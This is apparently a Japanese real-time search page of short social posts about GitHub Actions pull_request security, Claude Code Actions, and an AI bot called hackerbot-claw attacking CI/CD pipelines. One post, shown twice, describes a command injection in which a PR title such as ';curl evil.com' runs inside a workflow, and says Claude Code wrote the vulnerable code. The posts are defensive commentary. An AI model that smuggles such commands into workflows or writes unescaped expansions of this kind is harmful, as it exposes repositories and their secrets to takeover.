自動更新

並べ替え:新着順

メニューを開く

GitHub Actionspull_request_targetでなくpull_requestを使っていればforkリポジトリからのPRはシークレットにアクセスできないしGITHUB_TOKENはread権限になる DependabotはforkリポジトリからのPRとして扱われる

Kenta@プロダクトエンジニア@kenta_ja8

メニューを開く

Claude Code GitHub Actionsの起動に関する機能には以下の2つがある。 - @ Claude Code  ⇒GitHub上のIssueやPull Request等のコメント欄で、ユーザが@ claudeとメンションすることにより、Claude Codeを起動し、タスクを実行する機能。

メニューを開く

Claude Code GitHub Actionsを利用するには、/install-github-appコマンドを実行する。 Claude Code GitHub Actionsでは、明示的にPull Requestを指示しない限り、Pull Requestが作られることはない。

メニューを開く

#GitHub GitHub Actionspull_request_targetトリガーで、コードのチェックアウトするのはセキュリティリスク有り。 リポジトリシークレットにアクセスできる状態で、任意のコードを実行できてしまうことがある。

zigenin@zigenin

メニューを開く

GitHub Actionsのactionのcommit hashだけ悪意のあるものに差し替えられたPull Request出てきたとして、果たしてレビューで止められるだろうか

メニューを開く

リモートリポジトリをたてるのはGitHub以外でも可能で自社のプログラムを安全に管理したい団体はGitLabやGiteaをセルフホストしてたりする この辺を勉強するときはgitの機能(add, commit, push, etc...)とGitHubの機能(pull request, github actions, etc...)の区別をつけた状態で勉強するといいよ

メニューを開く

Nuxt5のDraft PRもできてた。 v5.0.0 by github-actions[bot] · Pull Request #34497 · nuxt/nuxt github.com/nuxt/nuxt/pull…

Shun KWHR@kojo_73

メニューを開く

ということで shfmt を dotfiles の CI に導入! feat: add shfmt step to GitHub Actions workflow for code formatting by shunk031 · Pull Request #314 · shunk031/dotfiles github.com/shunk031/dotfi…

しゅんけー「📕Pythonで学ぶ画像生成」発売中!@shunk031

メニューを開く

「自分のリポジトリは大丈夫かな」と思って監査したら、本当に脆弱性が見つかりました🔍 しかも犯人は Claude Code でした。 GitHub Actions の `run:` ブロック内で `${{ github.event.pull_request.title }}` を直接展開すると、PR タイトルに `;curl evil.com`

胡田@Microsoft MVP(2014~)&MCT / Masahiko Ebisuda@ebi

メニューを開く

「自分のリポジトリは大丈夫かな」と思って監査したら、本当に脆弱性が見つかりました🔍 しかも犯人は Claude Code でした。 GitHub Actions の `run:` ブロック内で `${{ github.event.pull_request.title }}` を直接展開すると、PR タイトルに `;curl evil.com`

胡田@Microsoft MVP(2014~)&MCT / Masahiko Ebisuda@ebi

メニューを開く

Microsoft/DataDog 標的の CI/CD 攻撃キャンペーン:Hackerbot-claw が GitHub Actions を悪用 iototsecnews.jp/2026/03/03/hac… この攻撃の背景にあるのは、GitHub Actions における pull_request_target ワークフローの設定不備です。

iototsecnews@iototsecnews

メニューを開く

[PR]📚今日の1冊📕2 タイトル:【POD】Google CloudとGitHub ActionsPull Request連動環境を作る本 価格:2,200円 #github #木村俊彦 #インプレスR&D #入門書 #技術書 #楽天Kobo #楽天Books hb.afl.rakuten.co.jp/hgc/g00q0726.r…

IT関連書籍@Torachi0401@xiang_si75209

メニューを開く

へぇ 「Claude Code Action は、GitHub Actions のワークフロー上で Claude を実行し、Issue や Pull Request を起点に開発タスクを自動化できる仕組み」 zenn.dev/chot/articles/…

なかつがわ@someone7140

メニューを開く

GitHub Actionsの権限にpull_request_targetなどの強い権限を使わないのが対策として大事 #jawsug #jawsdays2026 #jawsdays2026_a pic.x.com/2sXnWulIoC

メニューを開く

zenn.dev/aeyesec/articl… AIボット「hackerbot-claw」がGitHub Actionsの脆弱性を悪用した自動攻撃を解説。 コマンドインジェクションや不正なコード実行によるリポジトリ乗っ取りの実証と仕組みを紹介。 対策としてデータと命令の分離、pull_request_targetの安全な運用、AIへの権限最小化が重要。

topickapp (IT技術系ニュースサイト)@topickapp_com

トレンド6:54更新

  1. 1

    YSL ラブヌード

    • ラブヌード
    • YSL
    • イヴ・サンローラン・ボーテ アンバサダー
  2. 2

    ニュース

    「平和丸」乗組員

    • 事故後に辺野古土砂運搬のダンプ妨害
    • ダンプ妨害
    • 家宅捜索
  3. 3

    辺野古事故遺族がnoteに綴る無念の投稿 珊瑚礁を見たかった愛娘と異質すぎる研修旅行

  4. 4

    ボンディ司法長官

    • 司法長官
    • エプスタイン文書公開
    • パム・ボンディ
    • 事件対応
    • ボンディ
    • あなたの知らないアメリカ
  5. 5

    エンタメ

    野村の仲介プラス

    • 野村の仲介
    • 二宮和也
    • 相葉雅紀
  6. 6

    ニュース

    キンキンキラキラ

  7. 7

    グルメ

    金曜日だね

  8. 8

    シー(4)サー(3)

    • し(4)ゅみ(3)
    • 貴重な晴れ
    • 週末を迎え
    • 沖縄県那覇市
  9. 9

    3割減

    • 原油輸入
    • 4月以降
  10. 10

    今日は大安

20位まで見る

人気ポスト

よく使う路線を登録すると遅延情報をお知らせ Yahoo!リアルタイム検索アプリ
Yahoo!リアルタイム検索アプリ